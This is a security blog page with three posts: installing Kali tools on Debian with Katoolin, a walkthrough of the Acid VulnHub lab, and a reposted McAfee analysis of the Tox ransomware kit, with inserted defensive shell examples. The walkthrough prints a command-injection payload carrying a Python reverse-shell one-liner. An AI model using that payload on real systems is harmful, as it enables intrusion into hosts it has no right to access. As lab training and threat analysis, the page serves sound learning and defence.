Monday, October 12, 2015

[Tools] Katoolin

We all know Kali Linux is one of the most powerful platforms for conducting penetration tests. Why? Well, it is hard to beat a platform that comes packed with more than 600 applications ready to go.

Kali's new release, Kali Sana 2.0, came with a fancy new interface powered by GNOME 3: a side pane with shortcuts, an Ubuntu-like application menu, and so on.

Thing is, on older machines all these changes didn't go that well. Take into consideration that this new interface consumes about 700 MB of RAM.

So with this scenario, have you ever thought "Is there a way to pack all these tools and put them in my favorite day to day distro?" Well, thanks to LionSec, now it is possible.

Here is Katoolin, as simple and fantastic as a Python script, ready to be executed: it will add Kali's repositories to your distro, update the sources, install the Kali tools you pick and remove the repositories as if nothing happened. Cool, right? Keep in mind that while the repositories are enabled apt treats them like any other source, so updating from them can pull Kali's versions of shared packages into your base system; stick to installing tool packages and avoid a blanket upgrade while they are present.


  • Python 2.7
  • Of course, the base distro; in my case I will use Debian.


Go to the website and download the script from there:


From a terminal type:

  • apt-get install git
  • git clone

Once you have downloaded the Python script, all you have to do is give it execution permissions:

chmod +x

And then run it:


You will be presented with something like this:

First things first: type "1" to add Kali repositories and update the sources.

Then, type "2" to see all the different categories for the tools:

As you can see, you can select which tools to install; there is even an option to install them all (option 0). I wouldn't recommend it, though: if any tool fails to install it is much easier to track down when you go one by one, or category by category.

At the end, you can select which menu you want to install; there are two options:

  • ClassicMenu Indicator.
  • Kali Menu.
I selected the traditional Kali menu:

That's it. Now you have all your Kali tools in your favorite flavor.
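The cycle Katoolin automates (add the Kali source, update, install, remove the source) done by hand, as an added example that is not Katoolin's own code. It adds two safeguards the script skips: the archive key's fingerprint is checked before the key is trusted, and the Kali source is pinned below apt's default priority so an ordinary upgrade never swaps base-distro packages for Kali builds. Assumptions: $ROOT prefixes every path (empty on a real system, a temp dir when testing), DRY_RUN=1 prints the apt commands instead of running them, the suite name is a parameter (Kali 2.0 "Sana" used sana, current Kali uses kali-rolling), and the pin matches on the Release file's Origin field, which you should confirm with apt-cache policy.

```sh
#!/bin/sh
# Added example (not Katoolin's code): Katoolin's repo-add / install / repo-remove
# cycle by hand, with a key-fingerprint check and apt pinning. Assumptions:
# $ROOT prefixes all paths, DRY_RUN=1 echoes apt commands, suite is a parameter.
ROOT="${ROOT:-}"
DRY_RUN="${DRY_RUN:-0}"
KALI_SUITE="${KALI_SUITE:-kali-rolling}"
KALI_MIRROR="http://http.kali.org/kali"
# Archive signing key fingerprint as published by Kali in 2015; confirm against
# the current Kali documentation before trusting it.
KALI_FPR="44C6 513A 8E4F B3D3 0875 F758 ED44 4FF0 7D8D 0BF6"

run() { if [ "$DRY_RUN" = 1 ]; then echo "+ $*"; else "$@"; fi; }

# Safeguard 1: compare the fingerprint gpg reports for a downloaded key with the
# expected one. $1 = expected fingerprint, $2 = output of
# `gpg --with-colons --with-fingerprint <keyfile>`. Spaces and case are ignored.
fpr_matches() {
  expected=$(printf '%s' "$1" | tr -d ' ' | tr 'a-f' 'A-F')
  actual=$(printf '%s\n' "$2" | awk -F: '$1 == "fpr" { print $10; exit }')
  [ -n "$actual" ] && [ "$expected" = "$actual" ]
}

# Import the key only when the fingerprint matches. $1 = downloaded key file.
trust_kali_key() {
  listing=$(gpg --with-colons --with-fingerprint "$1") || return 1
  fpr_matches "$KALI_FPR" "$listing" || {
    echo "key fingerprint mismatch, refusing to trust $1" >&2
    return 1
  }
  run apt-key add "$1"
}

# Safeguard 2: add the source *and* pin it below the default priority of 500, so a
# plain `apt-get upgrade` never replaces base-distro packages with Kali builds.
# Matching on "Origin: Kali" is an assumption; check with `apt-cache policy`.
add_kali_repo() {
  mkdir -p "$ROOT/etc/apt/sources.list.d" "$ROOT/etc/apt/preferences.d"
  printf 'deb %s %s main contrib non-free\n' "$KALI_MIRROR" "$KALI_SUITE" \
    > "$ROOT/etc/apt/sources.list.d/kali.list"
  printf 'Package: *\nPin: release o=Kali\nPin-Priority: 100\n' \
    > "$ROOT/etc/apt/preferences.d/kali-pin"
  run apt-get update
}

# Install tools explicitly from the Kali suite: -t raises that suite's priority to
# 990 for this one command only, overriding the pin just for what you name.
install_from_kali() { run apt-get install -y -t "$KALI_SUITE" "$@"; }

# Same clean-up Katoolin does: drop the source and the pin, refresh the lists.
remove_kali_repo() {
  rm -f "$ROOT/etc/apt/sources.list.d/kali.list" \
        "$ROOT/etc/apt/preferences.d/kali-pin"
  run apt-get update
}

# Usage as root, with the key fetched to kali-archive-key.asc beforehand:
#   trust_kali_key kali-archive-key.asc && add_kali_repo \
#     && install_from_kali nmap sqlmap && remove_kali_repo
```

Because the pin is 100, `apt-cache policy <package>` will list the Kali candidate below the base-distro one, and only `install_from_kali` pulls it in; that is the property Katoolin's plain sources.list entry does not give you.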

Friday, October 2, 2015

[Walkthrough] Acid - Vulnhub

Decided to give the Acid machine available at Vulnhub a try.

After downloading the machine I just had to open it with VMware. As an FYI, its network adapter is set to Bridged by default; you can change this in the network settings.

First things first, I performed an nmap scan as usual. The first result showed all ports closed, so I decided to go a bit deeper and scan all 65535 ports; after a while (yeah, I know) the report showed only one port open, TCP port 33447, running Apache.

It is worth noting the /Challenge path attached to the nmap report. We will see more of that later. In the meantime, the main site looks like this:

Not much to see. I decided to check the page source looking for hints, and at the bottom of the page there was some hex code attached:


Which decoded turns into a base64 string:


which in turn decodes to wow.jpg

I decided to navigate to the common images folder /images/ and there it was, wow.jpg. I downloaded it, but checking it with strings and exiftool didn't show anything interesting.

Remember that /Challenge/ folder? Yeah, about time to double check it.

We are presented with a charming message:

I tried some SQLi but it seems it is not vulnerable. Later I figured out this form has default credentials that are available to anyone. Anyway...

At this point there wasn't much to keep moving with, so I decided to fire up DirBuster looking for new folders to sniff around in, and after a while it discovered 4 new files under the /Challenge/ directory:


  • protected_page.php shows nothing as I'm not logged in.
  • hacked.php shows you a form to put an ID, tried few things in this one, nothing worked.
  • cake.php apparently only contains a message, but if you take a look at the page title, it shows "/Magic_Box", which seems to be another path.

I gave DirBuster another round (one of my favorite tools) and it discovered a few new paths; /Magic_Box was indeed another path:


  • low.php showed absolutely nothing (blank page)
  • tails.php asks for a key to open the "Magical Doors"
  • command.php seems very interesting.
Checking command.php, it shows an interesting message and also has a form to submit an IP address; however, the response was always the same, so I decided to check the response in the background using Burp Suite. The application sends the IP parameter as seen:

After reading about separating commands with a semicolon (;) in this article:

I decided to try it here and wait for the response:

The next step was to obtain a reverse shell by using this vulnerability to execute commands. After researching reverse shells I tried a few without luck; after more research I came up with this code, which worked smoothly and gave me access to the system. The whole string is sent as the IP parameter: the leading semicolon ends the command the page runs, and the listener's IP goes in the connect() call. Of course, a netcat listener is required beforehand:

;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&submit=submit
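The injection behind command.php, reproduced locally as an added example (not code from the walkthrough or from the Acid VM). The two functions stand in for the server side, on the assumption that the page interpolated the submitted IP into a shell command; echo replaces ping so this runs harmlessly offline. The hardened version shows the two fixes that would have closed the hole: validate that the value is an IPv4 address, and pass it as an argument instead of building a command string.

```sh
#!/bin/sh
# Added example (not from the walkthrough): the shell-injection pattern behind
# command.php. Assumed server-side logic; `echo` stands in for `ping`.

# Vulnerable: the untrusted value is pasted into a command string, so ';' (or
# '&&', '|', '`...`', '$(...)') ends the intended command and starts a new one.
vuln_ping() {
  sh -c "echo ping -c 1 $1"
}

# Accept only a dotted quad with every octet in 0..255; returns 1 otherwise.
is_ipv4() {
  printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
  IFS=.
  set -- $1          # split on '.' into the function's positional parameters
  unset IFS
  for octet in "$@"; do
    [ "$octet" -le 255 ] || return 1
  done
}

# Hardened: reject anything that is not an address, and never hand the value to
# a shell for re-parsing; it is one argument of the command, quoted.
safe_ping() {
  is_ipv4 "$1" || { echo "rejected: $1" >&2; return 1; }
  echo ping -c 1 "$1"   # stand-in for: ping -c 1 "$1"
}

# Usage: safe_ping '127.0.0.1; id'  -> "rejected: 127.0.0.1; id", exit 1
#        vuln_ping '127.0.0.1; id'  -> runs id after the ping command
```

The second command in the test payload executes only through vuln_ping; the reverse-shell one-liner above works for exactly the same reason, it is just a longer second command.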

After sniffing around in the /home/ folder I found 2 users on the system:


I decided to continue looking for literally ANYTHING, and after a while I found a folder in / called /s.bin which had a file named "investigate.php".

Opening this file shows the message: "Now you have to behave like an investigator to catch the culprit"

After taking a break, I went back to check for more hidden files in the filesystem, checking one by one for any weird file or folder that could give some extra help. In the process I found a folder in /sbin/ named /sbin/raw_vs_isi, which contained a file, hint.pcapng.

pcapng is a packet capture format that can be opened with Wireshark; it looked something like this:

A lot of noise in the exchange. After a while reading about Wireshark display filters (I'm not an expert on them) I gave this one a try to see only traffic with source or destination port 1337 (tcp.port == 1337 is the shorthand for the same filter):

tcp.dstport == 1337 or tcp.srcport == 1337

After applying it, it only displayed the communication between .46 and .44; following the TCP stream, it had a curious message behind it:

It mentions the user that I had already found by sniffing directories, saman, and also says that he is known by the alias 1337hax0r. I decided to try sudo su with these credentials and, lucky me, it worked fine; I didn't have to escalate privileges by looking for kernel vulnerabilities or the like.

Now all I had to do was capture flag.txt, located in the /root/ folder:

There it is. After finishing my OSCP certification I wanted to get my hands dirty with some good and safe environments to play with; thanks to +VulnHub that is possible.

I was stuck for a while, a lot of frustration but it was worth it :)

Thanks for reading.

Edit: The pictures suck, will adjust them later :P

Sunday, May 24, 2015

Tox - Malware Construction Kits

The packaging of malware and malware-construction kits for cybercrime “consumers” has been a long-running trend. Various turnkey kits that cover remote access plus botnet plus stealth functions are available just about anywhere. Ransomware, though very prevalent, has not yet appeared in force in easy-to-deploy kits.
But now we have Tox, and it's free.

While sifting through our stream of "dark web" data, McAfee Labs found Tox on May 19. It was updated on May 21 with a new FAQ and an updated design, but the core did not change.

Salient Points:
  • Tox is free. You just have to register on the site.
  • Tox is dependent on TOR and Bitcoin, which allows for some degree of anonymity.
  • The malware works as advertised.
  • Out of the gate, the standard of antimalware evasion is fairly high, meaning the malware’s targets would need additional controls in place (HIPS, whitelisting, sandboxing) to catch or prevent this.
Once you register for the product, you can create your malware in three simple steps.
  • Enter the ransom amount. (The site takes 20% of the ransom.)
  • Enter your “cause.”
  • Submit the captcha.

This process creates an executable of about 2 MB that is disguised as a .scr file (a Windows screensaver, which is an ordinary PE executable under a different extension). The Tox "customers" then distribute and install it as they see fit. The Tox site (on the TOR network) tracks the installs and the profit. To withdraw funds, you need only supply a receiving Bitcoin address.

 Upon execution, the malware encrypts the victims’ data and prompts them for the ransom, including the Bitcoin address for sending payment.

Technical Information
Although easy to use and functional, the malware appears to lack complexity and efficiency within the code.

Tox malware portable executable sections.
The developer has left several identifying strings within the code. Examples:
  • C:/Users/Swogo/Desktop/work/tox/cryptopp/secblock.h
  • C:/Users/Swogo/Desktop/work/tox/cryptopp/filters.h
  • C:/Users/Swogo/Desktop/work/tox/cryptopp/cryptlib.h
  • C:/Users/Swogo/Desktop/work/tox/cryptopp/simple.h
Tox-generated malware is compiled with MinGW and uses AES to encrypt victims' files via the Crypto++ library. The Microsoft CryptoAPI is used for key generation.
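A first-pass triage of a suspicious .scr using the build-path strings quoted above, as an added example that is not from the McAfee write-up. Only the four indicator strings come from the page; the file handling is mine. It also generalizes the idea: rather than matching just this author's paths, it pulls out any C:\Users\<name>\ build path left in a binary, since a leaked developer user name is useful whichever kit produced the sample. Such strings are a weak indicator, trivially changed by a rebuild, so a hit means "look closer", not a verdict.

```sh
#!/bin/sh
# Added example (not from the McAfee write-up): string-based triage of a sample
# against the build paths left in Tox binaries, plus generic build-path recovery.
TOX_INDICATORS='C:/Users/Swogo/Desktop/work/tox/cryptopp/secblock.h
C:/Users/Swogo/Desktop/work/tox/cryptopp/filters.h
C:/Users/Swogo/Desktop/work/tox/cryptopp/cryptlib.h
C:/Users/Swogo/Desktop/work/tox/cryptopp/simple.h'

# Print every Tox indicator present in $1 (binary-safe fixed-string grep).
# Returns 0 on at least one hit, 1 on none.
tox_string_hits() {
  hits=0
  while IFS= read -r ind; do
    [ -n "$ind" ] || continue
    if LC_ALL=C grep -a -q -F -- "$ind" "$1"; then
      printf '%s\n' "$ind"
      hits=$((hits + 1))
    fi
  done <<EOF
$TOX_INDICATORS
EOF
  [ "$hits" -gt 0 ]
}

# Generalization: recover any C:\Users\<name>\ (or C:/Users/<name>/) build path
# from a binary, whoever compiled it. Each distinct prefix is printed once.
leaked_build_users() {
  LC_ALL=C grep -a -o -E 'C:[/\\]Users[/\\][A-Za-z0-9._ -]+[/\\]' "$1" | sort -u
}

# A .scr is a PE executable: 'MZ' at offset 0 means it runs like any .exe.
is_pe() { [ "$(head -c 2 "$1" 2>/dev/null)" = "MZ" ]; }

# Usage: tox_triage suspicious.scr
tox_triage() {
  f=$1
  is_pe "$f" && echo "$f: PE header present (screensaver extension is cosmetic)"
  if tox_string_hits "$f" >/dev/null; then
    echo "$f: Tox build-path strings present"
  fi
  leaked_build_users "$f" | sed "s|^|$f: build path |"
}
```

On a live sample run `tox_triage` first, then move to the behavioural indicators the article lists next (Curl and TOR dropped under %AppData%\Roaming, and a Curl process talking to a local SOCKS5 port), which a rebuild cannot remove as easily as a string.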

Network Information
The malware first downloads Curl and the TOR client:
  • hxxp://
  • hxxp://
All downloaded files and artifacts are stored in the following path:
  • C:\Users\<username>\AppData\Roaming\
After execution, Tox starts TOR and sends its Curl requests through it as a SOCKS5 proxy, with the following command-line parameters (both are Curl options: --socks5-hostname makes the proxy resolve the host name, which .onion addresses require, and --data sends a POST body):
--socks5-hostname --data

 We don’t expect Tox to be the last malware to embrace this model. We also anticipate more skilled development and variations in encryption and evasion techniques.

Source and credits: